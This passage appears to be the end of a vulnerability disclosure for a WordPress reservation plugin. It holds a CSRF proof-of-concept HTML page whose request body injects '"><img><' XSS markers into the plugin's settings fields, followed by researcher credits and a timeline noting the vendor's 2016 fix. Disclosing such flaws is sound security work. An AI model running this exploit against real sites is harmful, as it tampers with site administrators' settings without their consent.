text_digits=%22%3E%22%3Cimg%3E%3C%22&vs_text_max=%22%3E%22%3Cimg%3E%3C%22&vs_text_min=%22%3E%22%3Cimg%3E%3C%22&cp_cal_checkboxes_type1=0&cp_cal_checkboxes1=&notification_from_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&notification_destination_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&email_subject_notification_to_admin=%22%3E%22%3Cimg%3E%3C%22&email_notification_to_admin=New+reservation+made+with+the+following+information%3A%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&cu_user_email_field=email&email_subject_confirmation_to_user=%22%3E%22%3Cimg%3E%3C%22&email_confirmation_to_user=We+have+received+your+request+with+the+following+information%3A%0D%0A%0D%0A%25INFORMATION%25%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&dexcv_enable_captcha=true&dexcv_width=%22%3E%22%3Cimg%3E%3C%22&dexcv_height=%22%3E%22%3Cimg%3E%3C%22&dexcv_chars=%22%3E%22%3Cimg%3E%3C%22&dexcv_min_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_max_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise_length=%22%3E%22%3Cimg%3E%3C%22&dexcv_background=%22%3E%22%3Cimg%3E%3C%22&dexcv_border=%22%3E%22%3Cimg%3E%3C%22&dexcv_font=font-1.ttf&submit=Save+Changes";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+
+==========
+ CREDITS
+==========
+
+Vulnerability discovered by:
+	Joaquin Ramirez Martinez [i0 security-lab]
+	joaquin.ramirez.mtz.lab[at]gmail[dot]com
+	https://www.facebook.com/I0-security-lab-524954460988147/
+	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
+
+
+========
+TIMELINE
+========
+
+2016-02-01 vulnerability discovered
+2016-02-05 reported to vendor
+2016-02-08 released fixed plugin v1.0.24
+2016-02-08 public disclosure